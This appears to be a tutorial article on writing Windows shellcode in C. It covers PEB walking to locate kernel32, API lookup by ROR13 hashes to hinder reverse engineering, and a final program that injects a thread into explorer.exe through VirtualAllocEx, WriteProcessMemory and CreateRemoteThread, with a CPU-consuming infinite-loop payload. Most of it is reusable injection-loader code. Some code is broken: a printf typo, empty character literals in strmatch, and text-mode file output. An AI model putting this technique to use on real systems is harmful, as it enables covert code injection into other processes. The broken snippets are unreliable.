Writing Shellcode with a C Compiler

Background

There comes a time when some programmers need to write a block of code that can operate in a position independent fashion and be written somewhere (across the network, to another process etc.) as a single buffer of data. This type of code has been dubbed shellcode by its birth from software exploitation in which hackers need a small chunk of code which can get a shell. Through one nefarious trick or another the idea is to simply get this chunk of code to execute and do its magic. The code has to stand on its own and its author doesn’t have the luxury of being able to use modern software development practices to develop this shellcode.

Assembler is most commonly used to generate shellcode. When size is absolutely critical, this is a good choice. For me personally, I have a need in many of my projects to write blocks of code which do shellcode-like things that I need to inject into other process. In these cases, I don’t really care about size. Efficiency in development and debug-ability are more important to me for this task. In the beginning I would write stand-alone assembler (with NASM) and take the resultant output file and convert it into a C array and incorporate it into my program. This is the approach taken by most exploit payloads you’ll see on sites such as milw0rm. Eventually I became sick of this and started using inline assembly for most tasks, even though I really missed the full feature set of the NASM assembler. With some experimentation I’ve come up with a pretty workable system for writing this style of shellcode using almost entirely C (only need 2 instructions of inline assembler). The advantages are huge in terms of development speed and there is really no contest when it comes to debugging your shellcode. I’m no slouch when it comes to wielding a machine level debugger like ollydbg but it still pales in comparison to debugging at the c source code level with the visual studio debugger.

Getting Started

Some special care has to be taken with visual studio to ensure that it will generate output code in the specific format we need to be used as shellcode. Here is a list, which may change in the future depending on what they change in the compiler:

Use Release mode only. Debug mode (on recent compilers at least) will output functions in reverse order as well as insert lots of position dependant calls.
Disable Optimization. The compiler will optimize away functions it thinks aren’t being used, which we absolutely need.
Disable stack buffer checks (the /Gs flag). The stack cookie checker function called at the beginning and end of a function is at a position dependant static location in the binary, thus rendering any function outputted to be not re-locatable and useless for shellcode.

Your First Shellcode

#include <stdio.h>

void shell_code()
{
    for (;;)
        ;
}

void __declspec(naked) END_SHELLCODE(void) {}

int main(int argc, char *argv[])
{
    int sizeofshellcode = (int)END_SHELLCODE - (int)shell_code;

    // Show some info about our shellcode buffer
    printf("Shellcode starts at %p and is %d bytes long", shell_code. sizeofshellcode);

    // Now we can test out the shellcode by calling it from C!
    shell_code();

    return 0;
}

So the shellcode in this particular example is nothing more than an infinite loop but the important thing to note is the stub function END_SHELLCODE which is placed after the shell_code function. With this in place after the shell_code function we are able to determine the length of the shellcode by simply measuring the distance between the start of the shell_code function and the start of the END_SHELLCODE function. The beauty of C here is that we can access the program itself as a buffer, so if we needed write the shellcode to a file we could make a simple call such as fwrite(shell_code, sizeofshellcode, 1, filehandle);

From within the visual studio environment we can also conveniently debug the shellcode too by simply calling the shell_code function and using the normal IDE debugging features.

In this small first example we only use one function for our shellcode but it is possible to use many functions. All your functions though must be contiguous and exist somewhere between the shell_code function (beginning) and the END_SHELLCODE function marker. The reason this works is that when function calls happen to internal functions the target of the call is always relative. Basically the call instruction says “Call a function X number of bytes from here” so if we copy both the code that makes the call and the code its calling to some other location (like another process) and keep the distance between the call and the callee the same everything should link up just fine.

Using Data in your Shellcode

In traditional C source code if you need to use a piece of data such as an ASCII string you can simply do it inline without having to worry about where the data is, such as this: WinExec("evil.exe"); In this example the string “evil.exe” is actually in a static place within the C program (probably in the .rdata section of the compiled binary) and if we were to copy this code out and try to inject it into another process it would fail because the string probably won’t exist in the other process at exactly this location. Traditional assembler shellcode makes easy use of data by using the call instruction to get a pointer to the code itself which may have data intermingled. Here is that WinExec call but implemented in a shellcode manner with assembler:

call end_of_string
db 'evil.exe',0
end_of_string:
call WinExec

In this fragment the first call instruction hops over the string “evil.exe” and also places at the top of the stack a pointer to the string, which is then used as the argument to the WinExec function. This novel approach to using data is very space efficient but there is no direct equivalent we can do in C. I recommend using stack buffers for any strings you need to use if you want to write your shellcode in C. To make a string that is dynamically built on the stack (and thus easily relocatable) on modern Microsoft compilers you must do the following:

char mystring[] = {'e','v','i','l','.','e','x','e',0};
winexec(mystring);

Notice that I hade to declare my string as an explicit array of bytes. This is a recent change, in older Microsoft compilers if I said char mystring[] = "evil.exe"; it would produce code that builds the string dynamically with a series of mov instructions whereas now it will produce code that simply copies the string from a fixed location in memory to the stack, which doesn’t work if we need relocatable code. Try both approaches for yourself and look at the disassembly they produce (download the IDA Pro freeware edition if you don’t have the real thing). Your disassembly for this initialization should look something like this before any cleanup:


mov [ebp+mystring], 65h
mov [ebp+mystring+1], 76h
mov [ebp+mystring+2], 69h
mov [ebp+mystring+3], 6Ch
mov [ebp+mystring+4], 2Eh
mov [ebp+mystring+5], 65h
mov [ebp+mystring+6], 78h
mov [ebp+mystring+7], 65h
mov [ebp+mystring+8], 0

Strings are really the only headache when it comes to data. Everything else you might want to do works exactly like you’d expect and you have access to the full set of capabilities offered by C; structs, enums, typedefs, function pointers. Just keep all your data as local variables and you’ll be fine.

Using Library Functions (a.k.a. doing anything useful on a system)

I’m keeping this article focused on shellcode in a Windows environment. The principles above can be used on Unix systems as well. Windows shellcode is a bit trickier though in that we don’t have a consistent and widely published way to perform system calls with just a few lines of assembly code like we can in Unix (with a quick call to int 80h). To use system calls to do things such as read and write files and communicate across the network we need to use the Windows API functions which are provided by a set of DLLs. These DLLs eventually perform the necessary system calls (through sysenter not an interrupt) and the particulars of how it does so change with nearly every windows release. Shellcoding best practices and tomes such as the shellcoder’s handbook describe a method for looking up DLLs in memory and finding functions as needed. Two functions are required to be implemented in your shellcode if you want it to be portable accross windows versions: 1. A function to find Kernel32.dll, 2. An implementation of GetProcAddress() or a function to find the location of GetProcAddress(). The implementation I will provide for both of these uses hashing instead of string comparison so I will take a brief segue to explain and provide implementations of hashing for your shellcode.

Hashing Functions

The use of hashing for function lookups is very common for shellcode. The popular ROR13 hash technique is the most common and its implementation is used in the shellcoder’s handbook. The idea is that if we are looking for a function named “MyFunction” then instead of keeping that string in memory and doing a string comparison with every function name we come accross we can just produce a small (32-bit) hash value and just hash each function name and compare the hashes. This does not save processor time but may save some space in the shellcode and has definite anti-reverse engineering benefits. I provide both an ASCII and Unicode ROR13 hash functions below.

DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string)
{
    DWORD hash = 0;

    while (*unicode_string != 0)
    {
        DWORD val = (DWORD)*unicode_string++;
        hash = (hash >> 13) | (hash << 19); // ROR 13
        hash += val;
    }
    return hash;
}

DWORD __stdcall ror13_hash(const char *string)
{
    DWORD hash = 0;

    while (*string) {
        DWORD val = (DWORD) *string++;
        hash = (hash >> 13)|(hash << 19);  // ROR 13
        hash += val;
    }
    return hash;
}

Finding DLLs (such as Kernel32)

There are three lists available of the DLLs currently loaded in memory: InMemoryOrderModuleList, InInitializationOrderModuleList and InLoadOrderModuleList. These lists are available in the Process Environment Block (PEB). It doesn’t really matter which list you use in your shellcode, in the code I provide I will use InMemoryOrderModuleList. To access the PEB we must use two lines of inline assembler.

PPEB __declspec(naked) get_peb(void)
{
    __asm {
        mov eax, fs:[0x30]
        ret
    }
}

Now that we have access to the PEB from within our shellcode we can lookup DLLs in memory. The only DLL thats ALWAYS in memory in a windows process is ntdll.dll but kernel32.dll is much more convienient and still availibile in 99.99% of windows processes (must be Win32 subsystem). The implementation I provide below will look through the module list and find a module named kernel32.dll by using the unicode ROR13 hash we talked about earlier.

HMODULE __stdcall find_kernel32(void)
{
    return find_module_by_hash(0x8FECD63F);
}

HMODULE __stdcall find_module_by_hash(DWORD hash)
{
    PPEB peb;
    LDR_DATA_TABLE_ENTRY *module_ptr, *first_mod;

    peb = get_peb();

    module_ptr = (PLDR_DATA_TABLE_ENTRY)peb->Ldr->InMemoryOrderModuleList.Flink;
    first_mod = module_ptr;

    do {
        if (unicode_ror13_hash((WCHAR *)module_ptr->FullDllName.Buffer) == hash)
            return (HMODULE)module_ptr->Reserved2[0];
        else
            module_ptr = (PLDR_DATA_TABLE_ENTRY)module_ptr->Reserved1[0];
    } while (module_ptr && module_ptr != first_mod);   // because the list wraps,

    return INVALID_HANDLE_VALUE;
}

The find_module_by_hash function provided above will let you find any loaded DLL in memory given a hash value for the dll name. If you need to load a new DLL though that might not be in memory you’ll need to use the LoadLibrary function from within Kernel32.dll. To find the LoadLibrary function we need an implementation of GetProcAddress. The implementation below looks up a function from within a loaded DLL based on a hash of the function name.

FARPROC __stdcall find_function(HMODULE module, DWORD hash)
{
    IMAGE_DOS_HEADER *dos_header;
    IMAGE_NT_HEADERS *nt_headers;
    IMAGE_EXPORT_DIRECTORY *export_dir;
    DWORD *names, *funcs;
    WORD *nameords;
    int i;

    dos_header = (IMAGE_DOS_HEADER *)module;
    nt_headers = (IMAGE_NT_HEADERS *)((char *)module + dos_header->e_lfanew);
    export_dir = (IMAGE_EXPORT_DIRECTORY *)((char *)module + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    names = (DWORD *)((char *)module + export_dir->AddressOfNames);
    funcs = (DWORD *)((char *)module + export_dir->AddressOfFunctions);
    nameords = (WORD *)((char *)module + export_dir->AddressOfNameOrdinals);

    for (i = 0; i < export_dir->NumberOfNames; i++)
    {
        char *string = (char *)module + names[i];
        if (hash == ror13_hash(string))
        {
            WORD nameord = nameords[i];
            DWORD funcrva = funcs[nameord];
            return (FARPROC)((char *)module + funcrva);
        }
    }

    return NULL;
}

Now we can lookup functions like this:


HMODULE kern32 = find_kernel32();
FARPROC loadlibrarya = find_function(kern32, 0xEC0E4E8E);   // the hash of LoadLibraryA

The Finished Product

I now present the sum of all this knowledge in a C program that, when executed, creates a file containing shellcode named “shellcode.bin”. The shellcode has the ability to process inject a thread into the explorer.exe process which does nothing but an infinite loop. Note that this will consume all available CPU cycles when launched.

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <wchar.h>
#include <tlhelp32.h>

PPEB get_peb(void);
DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string);
DWORD __stdcall ror13_hash(const char *string);
HMODULE __stdcall find_module_by_hash(DWORD hash);
HMODULE __stdcall find_kernel32(void);
FARPROC __stdcall find_function(HMODULE module, DWORD hash);
HANDLE __stdcall find_process(HMODULE kern32, const char *procname);
VOID __stdcall inject_code(HMODULE kern32, HANDLE hprocess, const char *code, DWORD size);
BOOL __stdcall strmatch(const char *a, const char *b);

void __stdcall shell_code()
{
    HMODULE kern32;
    DWORD *dwptr;
    HANDLE hProcess;
    char procname[] = {'e','x','p','l','o','r','e','r','.','e','x','e',0};
    char code[] = {0xEB, 0xFE};

    kern32 = find_kernel32();
    hProcess = find_process(kern32, (char *)procname);
    inject_code(kern32, hProcess, code, sizeof code);
}

HANDLE __stdcall find_process(HMODULE kern32, const char *procname)
{
    FARPROC createtoolhelp32snapshot = find_function(kern32, 0xE454DFED);
    FARPROC process32first = find_function(kern32, 0x3249BAA7);
    FARPROC process32next = find_function(kern32, 0x4776654A);
    FARPROC openprocess = find_function(kern32, 0xEFE297C0);
    FARPROC createprocess = find_function(kern32, 0x16B3FE72);
    HANDLE hSnapshot;
    PROCESSENTRY32 pe32;

    hSnapshot = (HANDLE)createtoolhelp32snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return INVALID_HANDLE_VALUE;

    pe32.dwSize = sizeof( PROCESSENTRY32 );

    if (!process32first(hSnapshot, &pe32))
        return INVALID_HANDLE_VALUE;

    do
    {
        if (strmatch(pe32.szExeFile, procname))
        {
            return openprocess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
        }
    } while (process32next(hSnapshot, &pe32));

    return INVALID_HANDLE_VALUE;
}

BOOL __stdcall strmatch(const char *a, const char *b)
{
    while (*a != '' && *b != '')
    {
        char aA_delta = 'a' - 'A';
        char a_conv = *a >= 'a' && *a <= 'z' ? *a - aA_delta : *a;
        char b_conv = *b >= 'a' && *b <= 'z' ? *b - aA_delta : *b;

        if (a_conv != b_conv)
            return FALSE;
        a++;
        b++;
    }

    if (*b == '' && *a == '')
        return TRUE;
    else
        return FALSE;
}

VOID __stdcall inject_code(HMODULE kern32, HANDLE hprocess, const char *code, DWORD size)
{
    FARPROC virtualallocex = find_function(kern32, 0x6E1A959C);
    FARPROC writeprocessmemory = find_function(kern32, 0xD83D6AA1);
    FARPROC createremotethread = find_function(kern32, 0x72BD9CDD);
    LPVOID remote_buffer;
    DWORD dwNumBytesWritten;

    remote_buffer = virtualallocex(hprocess, NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (remote_buffer == NULL)
        return;

    if (!writeprocessmemory(hprocess, remote_buffer, code, size, &dwNumBytesWritten))
        return;

    createremotethread(hprocess, NULL, 0, remote_buffer, NULL, 0, NULL);
}

HMODULE __stdcall find_kernel32(void)
{
    return find_module_by_hash(0x8FECD63F);
}

HMODULE __stdcall find_module_by_hash(DWORD hash)
{
    PPEB peb;
    LDR_DATA_TABLE_ENTRY *module_ptr, *first_mod;

    peb = get_peb();

    module_ptr = (PLDR_DATA_TABLE_ENTRY)peb->Ldr->InMemoryOrderModuleList.Flink;
    first_mod = module_ptr;

    do {
        if (unicode_ror13_hash((WCHAR *)module_ptr->FullDllName.Buffer) == hash)
            return (HMODULE)module_ptr->Reserved2[0];
        else
            module_ptr = (PLDR_DATA_TABLE_ENTRY)module_ptr->Reserved1[0];
    } while (module_ptr && module_ptr != first_mod);   // because the list wraps,

    return INVALID_HANDLE_VALUE;
}

PPEB __declspec(naked) get_peb(void)
{
    __asm {
        mov eax, fs:[0x30]
        ret
    }
}

DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string)
{
    DWORD hash = 0;

    while (*unicode_string != 0)
    {
        DWORD val = (DWORD)*unicode_string++;
        hash = (hash >> 13) | (hash << 19); // ROR 13
        hash += val;
    }
    return hash;
}

DWORD __stdcall ror13_hash(const char *string)
{
    DWORD hash = 0;

    while (*string) {
        DWORD val = (DWORD) *string++;
        hash = (hash >> 13)|(hash << 19);  // ROR 13
        hash += val;
    }
    return hash;
}

FARPROC __stdcall find_function(HMODULE module, DWORD hash)
{
    IMAGE_DOS_HEADER *dos_header;
    IMAGE_NT_HEADERS *nt_headers;
    IMAGE_EXPORT_DIRECTORY *export_dir;
    DWORD *names, *funcs;
    WORD *nameords;
    int i;

    dos_header = (IMAGE_DOS_HEADER *)module;
    nt_headers = (IMAGE_NT_HEADERS *)((char *)module + dos_header->e_lfanew);
    export_dir = (IMAGE_EXPORT_DIRECTORY *)((char *)module + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    names = (DWORD *)((char *)module + export_dir->AddressOfNames);
    funcs = (DWORD *)((char *)module + export_dir->AddressOfFunctions);
    nameords = (WORD *)((char *)module + export_dir->AddressOfNameOrdinals);

    for (i = 0; i < export_dir->NumberOfNames; i++)
    {
        char *string = (char *)module + names[i];
        if (hash == ror13_hash(string))
        {
            WORD nameord = nameords[i];
            DWORD funcrva = funcs[nameord];
            return (FARPROC)((char *)module + funcrva);
        }
    }

    return NULL;
}

void __declspec(naked) END_SHELLCODE(void) {}

int main(int argc, char *argv[])
{
    FILE *output_file = fopen("shellcode.bin", "w");
    fwrite(shell_code, (int)END_SHELLCODE - (int)shell_code, 1, output_file);
    fclose(output_file);

    return 0;
}